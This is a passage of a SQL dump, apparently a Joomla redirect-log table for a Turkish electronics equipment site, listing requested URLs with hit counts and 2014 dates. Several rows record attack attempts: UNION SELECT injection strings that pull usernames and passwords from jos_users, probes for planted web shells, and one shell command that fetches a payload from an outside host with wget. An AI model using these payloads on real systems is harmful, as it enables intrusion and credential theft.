00:00:00',301),(6398,'http://3s-technologies.com.tr/index.php/en/?Itemid=57&id=39:lehimleme&lang=en&layout=default&option=com_content&view=category','','','',10,0,'2014-11-07 01:18:01','0000-00-00 00:00:00',301),(6399,'http://3s-technologies.com.tr/index.php/en/?Itemid=155&id=59&lang=tr&option=com_content&view=category','','','',2,0,'2014-11-07 02:52:44','0000-00-00 00:00:00',301),(6400,'http://3s-technologies.com.tr/index.php/en/?Itemid=2&id=43&lang=tr&option=com_content&view=category','','','',6,0,'2014-11-07 03:50:04','0000-00-00 00:00:00',301),(6401,'http://3s-technologies.com.tr/index.php/en/?Itemid=102&id=90&lang=tr&option=com_content&view=article','','','',2,0,'2014-11-07 06:01:06','0000-00-00 00:00:00',301),(6402,'http://3s-technologies.com.tr/index.php/en/?Itemid=119&id=108&lang=en&option=com_content&view=article','','','',2,0,'2014-11-07 08:32:54','0000-00-00 00:00:00',301),(6403,'http://3s-technologies.com.tr/index.php/en/?Itemid=37&id=36&lang=tr&option=com_content&view=category','','','',2,0,'2014-11-07 09:10:11','0000-00-00 00:00:00',301),(6404,'http://3s-technologies.com.tr/index.php/en/?Itemid=148&catid=57:screen-printer&id=146:manual-printer&lang=en&option=com_content&view=article','','','',8,0,'2014-11-07 10:07:15','0000-00-00 00:00:00',301),(6405,'http://3s-technologies.com.tr/index.php/en/?Itemid=155&id=59:bolgesel-lehimleme-mak&lang=en&layout=default&option=com_content&view=category','','','',2,0,'2014-11-07 11:41:34','0000-00-00 00:00:00',301),(6406,'http://3s-technologies.com.tr/index.php/en/?Itemid=125&id=113&lang=en&option=com_content&view=article','','','',7,0,'2014-11-07 11:41:39','0000-00-00 00:00:00',301),(6407,'http://3s-technologies.com.tr/index.php/en/?Itemid=98&catid=36:orta-hizli&id=86:mx350&lang=en&option=com_content&view=article','','','',4,0,'2014-11-07 12:19:09','0000-00-00 00:00:00',301),(6408,'http://3s-technologies.com.tr/index.php/en/?Itemid=158&catid=44:pota&id=157:spartan-8s8d&lang=en&option=com_content&view=article','','','',7,0,'2014-11-07 13:53:04','0000-00-00 00:00:00',301),(6409,'http://3s-technologies.com.tr/index.php/en/?Itemid=103&id=87&lang=tr&option=com_content&view=article','','','',3,0,'2014-11-07 15:27:41','0000-00-00 00:00:00',301),(6410,'http://3s-technologies.com.tr/index.php/en/?Itemid=60&id=40&lang=tr&option=com_content&view=category','','','',2,0,'2014-11-07 17:02:33','0000-00-00 00:00:00',301),(6411,'http://3s-technologies.com.tr/index.php/en/?Itemid=100&id=88&lang=tr&option=com_content&view=article','','','',2,0,'2014-11-07 18:36:33','0000-00-00 00:00:00',301),(6412,'http://3s-technologies.com.tr/index.php/en/?Itemid=133&id=126&lang=tr&option=com_content&view=article','','','',3,0,'2014-11-07 21:07:01','0000-00-00 00:00:00',301),(6413,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=en','','','',3,0,'2014-11-08 01:10:55','0000-00-00 00:00:00',301),(6414,'http://3s-technologies.com.tr/index.php/en/?Itemid=149&id=58&lang=tr&option=com_content&view=category','','','',2,0,'2014-11-08 04:03:30','0000-00-00 00:00:00',301),(6415,'http://3s-technologies.com.tr/index.php/en/?Itemid=101&id=89&lang=en&option=com_content&view=article','','','',2,0,'2014-11-08 11:15:43','0000-00-00 00:00:00',301),(6416,'http://3s-technologies.com.tr/index.php/en/?Itemid=146&id=147&lang=en&option=com_content&view=article','','','',2,0,'2014-11-08 13:29:35','0000-00-00 00:00:00',301),(6417,'http://3s-technologies.com.tr/index.php/en/?Itemid=147&id=145&lang=en&option=com_content&view=article','','','',4,0,'2014-11-08 15:03:46','0000-00-00 00:00:00',301),(6418,'http://3s-technologies.com.tr/index.php/en/?Itemid=122&id=111&lang=en&option=com_content&view=article','','','',2,0,'2014-11-08 17:32:19','0000-00-00 00:00:00',301),(6419,'http://3s-technologies.com.tr/index.php/en/?Itemid=151&id=150&lang=en&option=com_content&view=article','','','',6,0,'2014-11-08 17:32:24','0000-00-00 00:00:00',301),(6420,'http://3s-technologies.com.tr/index.php/en/?Itemid=163&id=167&lang=en&option=com_content&view=article','','','',2,0,'2014-11-08 19:06:46','0000-00-00 00:00:00',301),(6421,'http://www.3s-technologies.com.tr/index.php/en/images/stories/petx.php?baca','','','',5,0,'2014-11-09 23:47:25','0000-00-00 00:00:00',301),(6422,'http://www.3s-technologies.com.tr/index.php/en/images/stories/explore.php?baca','','','',6,0,'2014-11-09 23:47:31','0000-00-00 00:00:00',301),(6423,'http://3s-technologies.com.tr/index.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,group_concat(0x3C6B65793E','','','',1,0,'2014-11-10 10:21:19','0000-00-00 00:00:00',301),(6424,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/images/stories/food.php?rf','','','',1,0,'2014-11-11 13:45:15','0000-00-00 00:00:00',301),(6425,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=tr','','','',1,0,'2014-11-11 21:04:11','0000-00-00 00:00:00',301),(6426,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=tr','','','',2,0,'2014-11-11 23:31:42','0000-00-00 00:00:00',301),(6427,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/modules/display-modules/images/stories/food.php','','','',1,0,'2014-11-13 06:03:59','0000-00-00 00:00:00',301),(6428,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/modules/display-modules/images/stories/petx.gif','','','',1,0,'2014-11-13 06:04:09','0000-00-00 00:00:00',301),(6429,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list&amp;sa=U&amp;ei=C6JkVJr0BIPaPIX6gfAL&amp;ved=0CGAQFjAPOLQB&amp;usg=AFQjCNEOTauGJeMNVjAYCVToeCMyG9i6_g/?category','','','',1,0,'2014-11-13 12:38:42','0000-00-00 00:00:00',301),(6430,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-category-list?limitstart=0&amp;sa=U&amp;ei=IaJkVKHnIsmdPfbrgIgP&amp;ved=0CGAQFjAPOJwE&amp;usg=AFQjCNFAqJDUeMZrw_hshnRBIcQsrCdrOg/?category_id=\'','','','',1,0,'2014-11-13 13:02:23','0000-00-00 00:00:00',301),(6431,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-category-list?start=10&amp;sa=U&amp;ei=IaJkVKHnIsmdPfbrgIgP&amp;ved=0CGUQFjAQOJwE&amp;usg=AFQjCNEsaex0Cm45ikFCKFS9D8ycWHBWnw/?category_id=\'','','','',1,0,'2014-11-13 13:02:25','0000-00-00 00:00:00',301),(6432,'http://3s-technologies.com.tr/index.php/en/?Itemid=124&id=114&lang=en&option=com_content&view=article','','','',3,0,'2014-11-13 22:53:34','0000-00-00 00:00:00',301),(6433,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en&sa=U&ei=cpplVL33IYmGzAPemIH4Bw&ved=0CB4QFjAC&usg=AFQjCNF36M4LkWSC5e8uu3DdGrpe782uKg//images/stories/fold.gif','','','',1,0,'2014-11-14 06:01:52','0000-00-00 00:00:00',301),(6434,'http://www.3s-technologies.com.tr/index.php/en//images/stories/kapex.gif','','','',1,0,'2014-11-14 06:12:00','0000-00-00 00:00:00',301),(6435,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en&sa=U&ei=dJplVJb3L6LcywPdgoKIDg&ved=0CB4QFjAC&usg=AFQjCNE3GQn2bKLDVxSemXFtvA7h9mMkxg//images/stories/fold.gif','','','',1,0,'2014-11-14 06:12:50','0000-00-00 00:00:00',301),(6436,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en&sa=U&ei=dZplVPnTI8LEygPRpYLABw&ved=0CB4QFjAC&usg=AFQjCNEgk3Nq3nstlvsag2IpfacJrycaUQ//images/stories/fold.gif','','','',1,0,'2014-11-14 06:17:53','0000-00-00 00:00:00',301),(6437,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en&sa=U&ei=dpplVPeYFuaBywOqhYGoCQ&ved=0CB4QFjAC&usg=AFQjCNF48VfNqPSM5frayEqEOKTf6OqEtA//images/stories/fold.gif','','','',1,0,'2014-11-14 06:22:53','0000-00-00 00:00:00',301),(6438,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en&sa=U&ei=d5plVKT_B6rNygP174LoAw&ved=0CB4QFjAC&usg=AFQjCNFLzDcZwBFwMRlwkcH4KyYbHgHrxw//images/stories/fold.gif','','','',1,0,'2014-11-14 06:27:52','0000-00-00 00:00:00',301),(6439,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en&sa=U&ei=d5plVJXkOaXlywPQgIGgCg&ved=0CB4QFjAC&usg=AFQjCNEncROKyJXKtCK7MP-PSToNlWhWRw//images/stories/fold.gif','','','',1,0,'2014-11-14 06:32:58','0000-00-00 00:00:00',301),(6440,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en&sa=U&ei=eJplVM_6LKjXyQPJ8YCwCw&ved=0CB4QFjAC&usg=AFQjCNE-1c7FQiOozyZ6TI16GWDMbqeSBQ//images/stories/fold.gif','','','',1,0,'2014-11-14 06:38:01','0000-00-00 00:00:00',301),(6441,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en&sa=U&ei=eZplVOXiJurlywPtqoLQAg&ved=0CB4QFjAC&usg=AFQjCNEDh-AnFvYWvgPD9duJiTXi17RqLw//images/stories/fold.gif','','','',1,0,'2014-11-14 06:43:07','0000-00-00 00:00:00',301),(6442,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en&sa=U&ei=epplVOHPGqPgywPNuYGgCg&ved=0CB4QFjAC&usg=AFQjCNHgVuvkj9YOfgqgCpOL8a98ICMaSA//images/stories/fold.gif','','','',1,0,'2014-11-14 06:48:06','0000-00-00 00:00:00',301),(6443,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en&sa=U&ei=e5plVJeODaTNygPB5oDQCw&ved=0CB4QFjAC&usg=AFQjCNG8zuf3jNMEhiYZOI3qn2ke64vsxQ//images/stories/fold.gif','','','',1,0,'2014-11-14 06:53:10','0000-00-00 00:00:00',301),(6444,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_tag&controller=tag&task=add&article_id=-260479/**//*!union*//**//*!select*//**/concat(username,0x3a,password,0x3a,usertype)/**//*!from*//**/jos_users/**/&tmpl=component','','','',1,0,'2014-11-14 07:16:05','0000-00-00 00:00:00',301),(6445,'http://3s-technologies.com.tr/index.php/en/?option=com_tag&controller=tag&task=add&article_id=-260479/**//*!union*//**//*!select*//**/concat(username,0x3a,password,0x3a,usertype)/**//*!from*//**/jos_users/**/&tmpl=component','','','',2,0,'2014-11-14 07:31:08','0000-00-00 00:00:00',301),(6446,'http://3s-technologies.com.tr/index.php/en/?Itemid=118&id=107&lang=en&option=com_content&view=article','','','',2,0,'2014-11-14 14:44:56','0000-00-00 00:00:00',301),(6447,'http://3s-technologies.com.tr/index.php/en/?Itemid=107&id=96&lang=en&option=com_content&view=article','','','',3,0,'2014-11-14 16:20:53','0000-00-00 00:00:00',301),(6448,'http://3s-technologies.com.tr/index.php/en/?Itemid=43&id=99&lang=en&option=com_content&view=article','','','',2,0,'2014-11-14 17:56:05','0000-00-00 00:00:00',301),(6449,'http://3s-technologies.com.tr/index.php/en/?Itemid=164&id=60&lang=tr&option=com_content&view=category','','','',2,0,'2014-11-14 17:56:11','0000-00-00 00:00:00',301),(6450,'http://3s-technologies.com.tr/index.php/en/?Itemid=106&id=95&lang=en&option=com_content&view=article','','','',2,0,'2014-11-14 19:31:18','0000-00-00 00:00:00',301),(6451,'http://3s-technologies.com.tr/index.php/en/?Itemid=116&id=120&lang=en&option=com_content&view=article','','','',2,0,'2014-11-15 00:16:54','0000-00-00 00:00:00',301),(6452,'http://3s-technologies.com.tr/index.php/en/?Itemid=55&id=41:smd-firin&lang=tr&layout=default&option=com_content&view=category','','','',4,0,'2014-11-15 03:27:34','0000-00-00 00:00:00',301),(6453,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/images/stories/jalang.php.gif?rf','','','',1,0,'2014-11-15 10:05:09','0000-00-00 00:00:00',301),(6454,'http://3s-technologies.com.tr/index.php/en/?Itemid=116&catid=54:pcb-ve-stensil-temizleme-makineleri&id=120:trident&lang=tr&option=com_content&view=article','','','',6,0,'2014-11-15 12:59:19','0000-00-00 00:00:00',301),(6455,'http://3s-technologies.com.tr/index.php/en/?Itemid=60&id=40&lang=tr&limitstart=10&option=com_content&view=category','','','',4,0,'2014-11-15 19:20:48','0000-00-00 00:00:00',301),(6456,'http://3s-technologies.com.tr/index.php/en/?Itemid=131&id=125&lang=tr&option=com_content&view=article','','','',3,0,'2014-11-15 20:56:13','0000-00-00 00:00:00',301),(6457,'http://3s-technologies.com.tr/index.php/en/?Itemid=121&id=110&lang=en&option=com_content&view=article','','','',2,0,'2014-11-17 03:30:02','0000-00-00 00:00:00',301),(6458,'http://3s-technologies.com.tr/index.php/en/?Itemid=144&catid=44:pota&id=166:lfs-1&lang=en&option=com_content&view=article','','','',11,0,'2014-11-17 05:04:42','0000-00-00 00:00:00',301),(6459,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en&sa=U&ei=xU5pVMTUL8f-ygPP34DYDA&ved=0CJYCEBYwMzisAg&usg=AFQjCNHklv9_44OeYxKpZFSM8VcGLXQqmw//images/stories/fold.gif','','','',1,0,'2014-11-17 06:02:14','0000-00-00 00:00:00',301),(6460,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en&sa=U&ei=yk5pVPrLO4v8ywPHpoHwCg&ved=0CJYCEBYwMzisAg&usg=AFQjCNEoGnPnXJqPo8H0HxP27dSISJBp7g//images/stories/fold.gif','','','',1,0,'2014-11-17 06:24:21','0000-00-00 00:00:00',301),(6461,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en&sa=U&ei=zk5pVJG0NeHOygOPooCQBw&ved=0CJYCEBYwMzisAg&usg=AFQjCNHco5zqwyEAal7UaKDcMPnJVYmZSA//images/stories/fold.gif','','','',1,0,'2014-11-17 06:45:12','0000-00-00 00:00:00',301),(6462,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en&sa=U&ei=0k5pVIH2HOnLygOivoHQDw&ved=0CJYCEBYwMzisAg&usg=AFQjCNEwtERmoHXD47SDkBgQHg-NIuBEvw//images/stories/fold.gif','','','',1,0,'2014-11-17 07:06:15','0000-00-00 00:00:00',301),(6463,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en&sa=U&ei=1k5pVPvSLcemygP32YHICQ&ved=0CJYCEBYwMzisAg&usg=AFQjCNHxnuWHttn2tGJTxl2OX7LLlbO2Vw//images/stories/fold.gif','','','',1,0,'2014-11-17 07:27:33','0000-00-00 00:00:00',301),(6464,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en&sa=U&ei=3E5pVP0YyL_KA62CgtAK&ved=0CJYCEBYwMzisAg&usg=AFQjCNGUU_sC-Yt9aPmuSu3daSiSTIDJAA//images/stories/fold.gif','','','',1,0,'2014-11-17 07:47:57','0000-00-00 00:00:00',301),(6465,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en&sa=U&ei=4E5pVIvZGMS4ygPmuoGoBQ&ved=0CJYCEBYwMzisAg&usg=AFQjCNH3OydmsyuKQGOj85UVjbdNL5nPmQ//images/stories/fold.gif','','','',1,0,'2014-11-17 08:07:27','0000-00-00 00:00:00',301),(6466,'http://3s-technologies.com.tr/index.php/en/?Itemid=50&id=1&lang=tr&layout=blog&limitstart=5&option=com_content&view=category','','','',4,0,'2014-11-17 09:48:00','0000-00-00 00:00:00',301),(6467,'http://3s-technologies.com.tr/index.php/en/?Itemid=82&catid=41:smd-firin&id=73:ly-8c&lang=tr&option=com_content&view=article','','','',7,0,'2014-11-17 12:58:05','0000-00-00 00:00:00',301),(6468,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en&sa=U&ei=KsZpVOiwLqLMygOB-4KQBQ&ved=0CPEDEBYwXjjIAQ&usg=AFQjCNGLIN87WBYT1T0b9pSNGRcUpbmKZQ//images/stories/fold.gif','','','',1,0,'2014-11-17 13:39:04','0000-00-00 00:00:00',301),(6469,'http://3s-technologies.com.tr/index.php/en/?Itemid=105&id=94&lang=en&option=com_content&view=article','','','',2,0,'2014-11-17 16:09:51','0000-00-00 00:00:00',301),(6470,'http://3s-technologies.com.tr/index.php/en/?Itemid=130&id=124&lang=en&option=com_content&view=article','','','',3,0,'2014-11-17 17:44:46','0000-00-00 00:00:00',301),(6471,'http://3s-technologies.com.tr/index.php/en/?Itemid=122&catid=40:temizleme&id=111:stencil-temizleme-bga&lang=en&option=com_content&view=article','','','',8,0,'2014-11-17 22:29:47','0000-00-00 00:00:00',301),(6472,'http://3s-technologies.com.tr/index.php/en/?Itemid=137&id=56:rework-stasyonlari&lang=tr&layout=default&option=com_content&view=category','','','',6,0,'2014-11-17 23:59:25','0000-00-00 00:00:00',301),(6473,'http://3s-technologies.com.tr/index.php/en/?Itemid=58&catid=47:aoi&id=168:aoibilgi&lang=en&option=com_content&view=article','','','',6,0,'2014-11-18 01:34:13','0000-00-00 00:00:00',301),(6474,'http://3s-technologies.com.tr/index.php/en/?Itemid=147&catid=57:screen-printer&id=145:asp-300&lang=tr&option=com_content&view=article','','','',5,0,'2014-11-18 03:09:44','0000-00-00 00:00:00',301),(6475,'http://3s-technologies.com.tr/index.php/en/?Itemid=145&id=57:screen-printer&lang=tr&layout=default&option=com_content&view=category','','','',4,0,'2014-11-18 03:09:50','0000-00-00 00:00:00',301),(6476,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117&Itemid=128','','','',1,0,'2014-11-18 05:37:12','0000-00-00 00:00:00',301),(6477,'http://3s-technologies.com.tr/index.php/en/?Itemid=125&catid=40:temizleme&id=113:etiket-sokucu-tidypen&lang=en&option=com_content&view=article','','','',6,0,'2014-11-18 11:01:37','0000-00-00 00:00:00',301),(6478,'http://3s-technologies.com.tr/index.php/en/?Itemid=144&id=166&lang=en&option=com_content&view=article','','','',6,0,'2014-11-18 11:01:42','0000-00-00 00:00:00',301),(6479,'http://3s-technologies.com.tr/index.php/en/?Itemid=160&id=164&lang=tr&option=com_content&view=article','','','',2,0,'2014-11-18 11:01:53','0000-00-00 00:00:00',301),(6480,'http://3s-technologies.com.tr/index.php/en/?Itemid=38&id=82&lang=en&option=com_content&view=article','','','',4,0,'2014-11-18 15:46:06','0000-00-00 00:00:00',301),(6481,'http://3s-technologies.com.tr/index.php/en/@�?o=3&g=&s=&z=���������Ӭ?','','http://3s-technologies.com.tr/index.php/en/','',1,0,'2014-11-18 17:25:25','0000-00-00 00:00:00',301),(6482,'http://3s-technologies.com.tr/index.php/en/?Itemid=158&id=157&lang=en&option=com_content&view=article','','','',3,0,'2014-11-18 17:32:21','0000-00-00 00:00:00',301),(6483,'http://3s-technologies.com.tr/index.php/en/?Itemid=154&catid=58:dusuk-hizli-smd-dizgi&id=153:ls60v&lang=en&option=com_content&view=article','','','',6,0,'2014-11-18 18:55:15','0000-00-00 00:00:00',301),(6484,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/images/stories/petx.php','','','',1,0,'2014-11-18 22:00:37','0000-00-00 00:00:00',301),(6485,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content//images/stories/petx.php?cmd=wget http://visionafricamagazine.com/scripts/x.log;lwp-download http://visionafricamagazine.com/scripts/x.log;fetch http://','','','',1,0,'2014-11-18 22:00:41','0000-00-00 00:00:00',301),(6486,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/images/stories/adminx.gif','','','',1,0,'2014-11-18 22:00:50','0000-00-00 00:00:00',301),(6487,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122&Itemid=129&lang=tr','','','',6,0,'2014-11-18 22:39:53','0000-00-00 00:00:00',301),(6488,'http://3s-technologies.com.tr/index.php/en/?Itemid=140&id=138&lang=en&option=com_content&view=article','','','',3,0,'2014-11-19 01:14:00','0000-00-00 00:00:00',301),(6489,'http://3s-technologies.com.tr/index.php/en/?Itemid=127&catid=40:temizleme&id=116:sogutucu-sprey-frz&lang=tr&option=com_content&view=article','','','',6,0,'2014-11-19 01:26:54','0000-00-00 00:00:00',301),(6490,'http://3s-technologies.com.tr/index.php/en/?Itemid=81&id=155&lang=en&option=com_content&view=article','','','',6,0,'2014-11-19 01:26:58','0000-00-00 00:00:00',301),(6491,'http://3s-technologies.com.tr/index.php/en/?Itemid=133&catid=55:katalog&id=126:e-katalog&lang=en&option=com_content&view=article','','','',4,0,'2014-11-19 06:12:35','0000-00-00 00:00:00',301),(6492,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=en','','','',14,0,'2014-11-19 18:56:34','0000-00-00 00:00:00',301),(6493,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=51&Itemid=92&lang=tr','','','',15,0,'2014-11-19 19:00:06','0000-00-00 00:00:00',301),(6494,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=40&Itemid=60&lang=tr&limitstart=10','','','',12,0,'2014-11-19 19:04:25','0000-00-00 00:00:00',301),(6495,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=136&Itemid=138','','','',8,0,'2014-11-19 19:08:55','0000-00-00 00:00:00',301),(6496,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=160&Itemid=161','','','',5,0,'2014-11-19 19:18:43','0000-00-00 00:00:00',301),(6497,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=146&Itemid=148','','','',4,0,'2014-11-19 19:19:47','0000-00-00 00:00:00',301),(6498,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=95','','','',4,0,'2014-11-19 19:20:09','0000-00-00 00:00:00',301),(6499,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164','','','',2,0,'2014-11-19 19:33:48','0000-00-00 00:00:00',301),(6500,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87','','','',8,0,'2014-11-19 19:36:19','0000-00-00 00:00:00',301),(6501,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=47&Itemid=1&lang=tr','','','',3,0,'2014-11-19 19:48:42','0000-00-00 00:00:00',301),(6502,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=149&Itemid=150','','','',2,0,'2014-11-19 20:00:00','0000-00-00 00:00:00',301),(6503,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=42&Itemid=27','','','',3,0,'2014-11-19 20:02:51','0000-00-00 00:00:00',301),(6504,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=141&Itemid=143','','','',2,0,'2014-11-19 20:07:48','0000-00-00 00:00:00',301),(6505,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=60&Itemid=164','','','',8,0,'2014-11-19 20:41:51','0000-00-00 00:00:00',301),(6506,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=150&Itemid=151','','','',3,0,'2014-11-19 20:47:35','0000-00-00 00:00:00',301),(6507,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164','','','',3,0,'2014-11-19 20:49:32','0000-00-00 00:00:00',301),(6508,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=107&Itemid=118','','','',7,0,'2014-11-19 20:50:14','0000-00-00 00:00:00',301),(6509,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97','','','',2,0,'2014-11-19 20:59:21','0000-00-00 00:00:00',301),(6510,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=56&Itemid=137&lang=tr','','','',6,0,'2014-11-19 21:12:06','0000-00-00 00:00:00',301),(6511,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=122&Itemid=129','','','',1,0,'2014-11-19 21:14:34','0000-00-00 00:00:00',301),(6512,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=121&Itemid=115','','','',5,0,'2014-11-19 21:18:08','0000-00-00 00:00:00',301),(6513,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=159&Itemid=162','','','',3,0,'2014-11-19 21:21:24','0000-00-00 00:00:00',301),(6514,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=140&Itemid=142','','','',4,0,'2014-11-19 21:23:11','0000-00-00 00:00:00',301),(6515,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=71&Itemid=79','','','',3,0,'2014-11-19 21:24:03','0000-00-00 00:00:00',301),(6516,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=106&Itemid=113','','','',3,0,'2014-11-19 21:39:53','0000-00-00 00:00:00',301),(6517,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=58&Itemid=149','','','',8,0,'2014-11-19 21:46:00','0000-00-00 00:00:00',301),(6518,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=89&Itemid=101','','','',4,0,'2014-11-19 21:47:47','0000-00-00 00:00:00',301),(6519,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=139&Itemid=141','','','',11,0,'2014-11-19 21:48:16','0000-00-00 00:00:00',301),(6520,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=111&Itemid=122&lang=en','','','',4,0,'2014-11-19 21:51:16','0000-00-00 00:00:00',301),(6521,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=109&Itemid=120','','','',10,0,'2014-11-19 22:00:24','0000-00-00 00:00:00',301),(6522,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=57&Itemid=145','','','',2,0,'2014-11-19 22:21:51','0000-00-00 00:00:00',301),(6523,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=164&Itemid=160','','','',3,0,'2014-11-19 22:22:35','0000-00-00 00:00:00',301),(6524,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=93&Itemid=104','','','',5,0,'2014-11-19 22:26:17','0000-00-00 00:00:00',301),(6525,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=73&Itemid=82','','','',2,0,'2014-11-19 22:38:59','0000-00-00 00:00:00',301),(6526,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=83&Itemid=95','','','',3,0,'2014-11-19 22:43:07','0000-00-00 00:00:00',301),(6527,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=156&Itemid=157&lang=en','','','',4,0,'2014-11-19 22:45:53','0000-00-00 00:00:00',301),(6528,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=114&Itemid=124','','','',4,0,'2014-11-19 22:46:16','0000-00-00 00:00:00',301),(6529,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=85&Itemid=97','','','',3,0,'2014-11-19 22:47:20','0000-00-00 00:00:00',301),(6530,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=154&Itemid=156&lang=en','','','',3,0,'2014-11-19 22:51:41','0000-00-00 00:00:00',301),(6531,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=40&Itemid=60&lang=en&limitstart=10','','','',7,0,'2014-11-19 22:57:59','0000-00-00 00:00:00',301),(6532,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=80&Itemid=87','','','',3,0,'2014-11-19 23:14:51','0000-00-00 